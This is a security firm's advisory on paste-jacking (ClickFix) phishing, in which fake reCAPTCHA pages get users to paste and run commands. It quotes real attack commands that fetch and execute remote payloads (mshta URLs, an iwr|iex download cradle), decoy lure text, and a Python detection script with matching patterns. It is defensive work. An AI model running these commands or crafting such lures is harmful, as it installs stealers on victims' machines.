Threat Insight

Threat Actors Using Paste-Jacking to Achieve Remote Code Execution

During 2025, Truesec SOC has observed a new phishing trend called paste-jacking (also reported under the name ClickFix). Paste-jacking is a technique in which the threat actor tricks the user into running a command on their own machine, which gives the actor remote code execution on the victim's device.


The user is typically presented with what appears to be a reCAPTCHA or some other “Verify that you are human” check. Meanwhile the page places a command on the user's clipboard through a JavaScript hook. The user is then instructed to press Win + R to open the Run dialog, press Ctrl + V to paste the command, and press Enter. The pasted command launches mshta.exe or a similar utility that fetches and executes the actor's payload.

Truesec Security Operations Center has observed variants of this technique. Instead of showing the instructions immediately, the page presents a reCAPTCHA that fails with an error message, which shows that the technique is constantly being re-innovated. The error message looks like this:

  • “Verification Failed – Network Error”
  • “The network DNS might be unstable, causing errors.”
  • “To fix this: Press Windows + R. Press CTRL + V. Press Enter.”

The Truesec SOC has also observed an increase in ClickFix attacks targeting macOS. The attack technique remains similar to previously described methods. This update aims to inform you about a potential new campaign targeting this specific operating system. SecurityWeek recently published an article on the subject as well [1].

Once the script has executed, we have observed connections to actor-controlled servers, followed by registry changes and the host downloading the “Lumma” stealer.

This campaign has likely been carried out by the threat actor known as Evil Corp, which is also behind SocGholish and Raspberry Robin.

Exploitation

This technique has been observed across many of our customers; all affected customers have been notified through an incident report.

Inform your users about the evolving landscape of phishing techniques. Paste-jacking is a relatively new technique that is being weaponized by a growing number of threat actors, and Truesec expects to see more occurrences of it. To mitigate the risk, we recommend disabling the Run command (Windows + R) through Group Policy (GPO). The relevant setting is “Remove Run menu from Start Menu” under User Configuration > Administrative Templates > Start Menu and Taskbar; enabling it also disables the Windows + R shortcut. Before implementing this measure in your production environment, Truesec advises conducting an internal assessment to ensure compatibility with your operational needs; in most cases the change is not expected to cause issues. Note that the policy only removes the Run dialog: it does not stop a user from pasting the same command into a PowerShell or Terminal window, and it does not apply to the macOS variant described above, so user awareness remains the primary control.

Detection

Commands seen executed in paste-jacking events (indicators are defanged; only one of these is used per event). The text after “#” is ignored by the command and serves as a decoy message that the user sees in the Run dialog. Because the command is launched from the Run dialog, the resulting mshta.exe or powershell.exe process has explorer.exe as its parent, which is a useful pivot in process-creation telemetry:

mshta hxxps://captha-secure[.]com/capcha[.]html # ✅ ”I am not a robot – reCAPTCHA Verification ID: 3781”

iwr -useb hxxp://185[.]149[.]146[.]164/trwsfg[.]ps1 | iex

mshta 80[.]64[.]30[.]238/evix[.]xll # Microsoft Windows: Fix Internet DNS Service reconnect
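As an added example (not Truesec's tooling and not part of the original advisory), the script below triages process-creation events, shaped like Sysmon Event ID 1 records (Image, CommandLine, ParentImage), for the chain described above: a command pasted into the Run dialog starts as a child of explorer.exe, fetches remote content, often pipes a web request into iex, and may carry a trailing “#” comment that mimics a verification or fix message. It also refangs the indicators listed above so they can be matched as published. The sample events are constructed; the field names, the set of interpreters, the powershell wrapper around the iwr|iex line and the benign events are assumptions.

```python
"""Triage of process-creation events for paste-jacking (ClickFix) patterns.

Added example, not Truesec's own tooling. Event fields mirror Sysmon
Event ID 1 (Image, CommandLine, ParentImage); all sample events are
constructed for illustration.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Indicators from the advisory, kept defanged exactly as they are published.
DEFANGED_IOCS = [
    "hxxps://captha-secure[.]com/capcha[.]html",
    "hxxp://185[.]149[.]146[.]164/trwsfg[.]ps1",
    "80[.]64[.]30[.]238/evix[.]xll",
]


def refang(ioc: str) -> str:
    """Undo report-style defanging (hxxp -> http, [.] -> .) so IOCs are matchable."""
    return ioc.replace("hxxp", "http").replace("[.]", ".")


def host_of(url: str) -> str:
    """Lower-cased host part of a URL or of a scheme-less host/path string."""
    no_scheme = re.sub(r"^https?://", "", url, flags=re.I)
    return no_scheme.split("/", 1)[0].split(":", 1)[0].lower()


IOC_HOSTS = {host_of(refang(i)) for i in DEFANGED_IOCS}

# Domain or IPv4 host, optional scheme and port, followed by a path. The scheme
# is optional because mshta accepts scheme-less "80.64.30.238/evix.xll".
REMOTE_RE = re.compile(
    r"(?:https?://)?(?:(?:\d{1,3}\.){3}\d{1,3}|[a-z0-9-]+(?:\.[a-z0-9-]+)+)(?::\d+)?/\S+",
    re.I,
)
# Download cradle: a web request piped straight into Invoke-Expression.
CRADLE_RE = re.compile(
    r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|curl|wget)\b.*\|\s*(?:iex|invoke-expression)\b",
    re.I,
)
# Trailing "#" comment that mimics a verification or fix message (assumed keyword list).
DECOY_RE = re.compile(r"#.*\b(?:robot|captcha|verif\w*|dns)\b", re.I)

RUN_DIALOG_PARENT = "explorer.exe"  # Win+R starts processes as children of explorer.exe
INTERPRETERS = {"mshta.exe", "powershell.exe", "pwsh.exe", "cmd.exe", "curl.exe", "msiexec.exe"}


@dataclass
class ProcessEvent:
    image: str          # Sysmon "Image": full path of the new process
    command_line: str   # Sysmon "CommandLine"
    parent_image: str   # Sysmon "ParentImage"


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def remote_host(command_line: str) -> Optional[str]:
    m = REMOTE_RE.search(command_line)
    return host_of(m.group(0)) if m else None


def triage(ev: ProcessEvent) -> List[str]:
    """Return the reasons an event looks like paste-jacking; empty list if none."""
    reasons = []
    host = remote_host(ev.command_line)
    if host in IOC_HOSTS:
        reasons.append(f"known indicator: {host}")
    from_run_dialog = (basename(ev.parent_image) == RUN_DIALOG_PARENT
                       and basename(ev.image) in INTERPRETERS)
    if from_run_dialog and host:
        reasons.append(f"interpreter started from Run dialog fetching from {host}")
    if CRADLE_RE.search(ev.command_line):
        reasons.append("web request piped into iex (download cradle)")
    if DECOY_RE.search(ev.command_line):
        reasons.append("decoy comment mimicking a verification or fix message")
    return reasons


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
MSHTA = r"C:\Windows\System32\mshta.exe"
EXPLORER = r"C:\Windows\explorer.exe"

SAMPLE_EVENTS = [  # constructed; 0-2 are the advisory's commands as they would be logged
    ProcessEvent(MSHTA, 'mshta https://captha-secure.com/capcha.html # ✅ "I am not a robot – reCAPTCHA Verification ID: 3781"', EXPLORER),
    ProcessEvent(PS, 'powershell -c "iwr -useb http://185.149.146.164/trwsfg.ps1 | iex"', EXPLORER),
    ProcessEvent(MSHTA, "mshta 80.64.30.238/evix.xll # Microsoft Windows: Fix Internet DNS Service reconnect", EXPLORER),
    ProcessEvent(PS, "powershell", EXPLORER),                                     # shell opened via Run: benign
    ProcessEvent(MSHTA, r'mshta "C:\Program Files\Vendor\setup.hta"', EXPLORER),  # local HTA via Run: benign
    ProcessEvent(PS, r"powershell -File C:\scripts\inventory.ps1", r"C:\Windows\System32\services.exe"),
]


def flagged_indices(events=SAMPLE_EVENTS) -> List[int]:
    """Indices of events with at least one triage reason."""
    return [i for i, ev in enumerate(events) if triage(ev)]


if __name__ == "__main__":
    for i, ev in enumerate(SAMPLE_EVENTS):
        reasons = triage(ev)
        print(f"[{'ALERT' if reasons else 'ok   '}] {ev.command_line[:70]}")
        for r in reasons:
            print("        -", r)
```

The heuristics are deliberately combined: an interpreter started from the Run dialog only counts when it also reaches out to a remote host, so a user who simply opens PowerShell via Win + R or runs a local HTA does not fire. Matching on the parent/child relationship is what separates this chain from the same binaries launched by scripts or scheduled tasks.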

References

[1] https://www.securityweek.com/clickfix-attacks-against-macos-users-evolving/
